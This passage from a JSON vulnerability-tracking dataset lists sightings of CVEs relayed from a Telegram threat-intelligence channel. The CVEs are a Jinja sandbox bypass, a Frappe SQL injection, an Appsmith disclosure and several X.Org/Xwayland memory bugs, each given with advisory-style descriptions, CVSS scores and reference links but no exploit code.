a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup. This vulnerability is fixed in 3.1.6.\n\ud83d\udccf Published: 2025-03-05T20:40:06.568Z\n\ud83d\udccf Modified: 2025-05-01T00:13:00.395Z\n\ud83d\udd17 References:\n1. https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\n2. https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403", "creation_timestamp": "2025-05-01T01:13:33.000000Z"}, {"uuid": "fefcb763-b211-48aa-b7eb-e28c2290787b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6PHG-4WMQ-H5H3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8883", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30217\n\ud83d\udd25 CVSS Score: 4.6 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Frappe is a full-stack web application framework. Prior to versions 14.93.2 and 15.55.0, a SQL Injection vulnerability has been identified in Frappe Framework which could allow a malicious actor to access sensitive information. Versions 14.93.2 and 15.55.0 contain a patch for the issue. No known workarounds are available.\n\ud83d\udccf Published: 2025-03-26T16:18:31.638Z\n\ud83d\udccf Modified: 2025-03-26T16:18:31.638Z\n\ud83d\udd17 References:\n1. https://github.com/frappe/frappe/security/advisories/GHSA-6phg-4wmq-h5h3", "creation_timestamp": "2025-03-26T16:25:15.000000Z"}, {"uuid": "18c15707-1ddf-4eba-90a4-61340d00fcc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-794X-GM8V-2WJ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/8959", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55965\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Appsmith before 1.51. Users invited as \"App Viewer\" incorrectly have access to development information of a workspace (specifically, a list of datasources in a workspace they're a member of). This information disclosure does not expose sensitive data in the datasources, such as database passwords and API Keys.\n\ud83d\udccf Published: 2025-03-26T00:00:00.000Z\n\ud83d\udccf Modified: 2025-03-26T20:12:18.796Z\n\ud83d\udd17 References:\n1. https://github.com/appsmithorg/appsmith/security/advisories/GHSA-794x-gm8v-2wj6", "creation_timestamp": "2025-03-26T20:25:48.000000Z"}, {"uuid": "1b6a5c77-6b8c-4e5a-ae87-af31cdd0d884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "76b9865d-c313-44e9-917b-16cbe9ae8691", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2500", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9006", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26601\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When changing an alarm, the values of the change mask are evaluated one after the other, changing the trigger values as requested, and eventually, SyncInitTrigger() is called. If one of the changes triggers an error, the function will return early, not adding the new sync object, possibly causing a use-after-free when the alarm eventually triggers.\n\ud83d\udccf Published: 2025-02-25T15:55:36.775Z\n\ud83d\udccf Modified: 2025-03-27T04:22:08.108Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26601\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345251", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "a5793f0d-c098-48b9-a3d0-542fbe662d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "4f4c876e-474b-46a7-9fd2-0fd33059de9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "016ac202-fde1-4d42-b9c5-dc6480623832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2502", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "f7a48534-d33a-47f4-a9b7-aca7e4db1444", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "1cbb6d67-08c0-4ffc-adcc-68d468d2adce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "86c79fce-ded6-420c-a18d-fe148957f752", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "ddbd6a94-0a6c-487e-8b7e-9f0021bca866", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2862", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "f43665c7-2b90-4d73-8fda-f4ec967d823d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2866", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "2c4595ba-1d3d-4699-8061-f5d5f639f603", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2880", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "b0c37372-cd42-4f91-8dd0-861c745a6463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26600\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A use-after-free flaw was found in X.Org and Xwayland. When a device is removed while still frozen, the events queued for that device remain while the device is freed. Replaying the events will cause a use-after-free.\n\ud83d\udccf Published: 2025-02-25T15:55:20.421Z\n\ud83d\udccf Modified: 2025-03-27T04:21:52.306Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26600\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345252", "creation_timestamp": "2025-03-27T04:25:50.000000Z"}, {"uuid": "659ddc85-4718-44d0-b935-74b364a84bb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2874", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9011", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26596\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A heap overflow flaw was found in X.Org and Xwayland. The computation of the length in XkbSizeKeySyms() differs from what is written in XkbWriteKeySyms(), which may lead to a heap-based buffer overflow.\n\ud83d\udccf Published: 2025-02-25T15:54:23.693Z\n\ud83d\udccf Modified: 2025-03-27T04:20:12.127Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26596\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345256", "creation_timestamp": "2025-03-27T04:25:57.000000Z"}, {"uuid": "a97bef20-5b65-4edd-8f4d-c8ae996b5ef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2865", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "bccbece0-0d6c-4a8f-a563-79acbc1e4d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2879", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9008", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26599\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An access to an uninitialized pointer flaw was found in X.Org and Xwayland. The function compCheckRedirect() may fail if it cannot allocate the backing pixmap. In that case, compRedirectWindow() will return a BadAlloc error without validating the window tree marked just before, which leaves the validated data partly initialized and the use of an uninitialized pointer later.\n\ud83d\udccf Published: 2025-02-25T15:55:02.964Z\n\ud83d\udccf Modified: 2025-03-27T04:21:07.505Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2500\n2. https://access.redhat.com/errata/RHSA-2025:2502\n3. https://access.redhat.com/errata/RHSA-2025:2861\n4. https://access.redhat.com/errata/RHSA-2025:2862\n5. https://access.redhat.com/errata/RHSA-2025:2865\n6. https://access.redhat.com/errata/RHSA-2025:2866\n7. https://access.redhat.com/errata/RHSA-2025:2873\n8. https://access.redhat.com/errata/RHSA-2025:2874\n9. https://access.redhat.com/errata/RHSA-2025:2875\n10. https://access.redhat.com/errata/RHSA-2025:2879\n11. https://access.redhat.com/errata/RHSA-2025:2880\n12. https://access.redhat.com/security/cve/CVE-2025-26599\n13. https://bugzilla.redhat.com/show_bug.cgi?id=2345253", "creation_timestamp": "2025-03-27T04:25:51.000000Z"}, {"uuid": "c782ff60-f8a3-4d41-a0c1-4c764623eb32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2875", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9012", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26595\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: 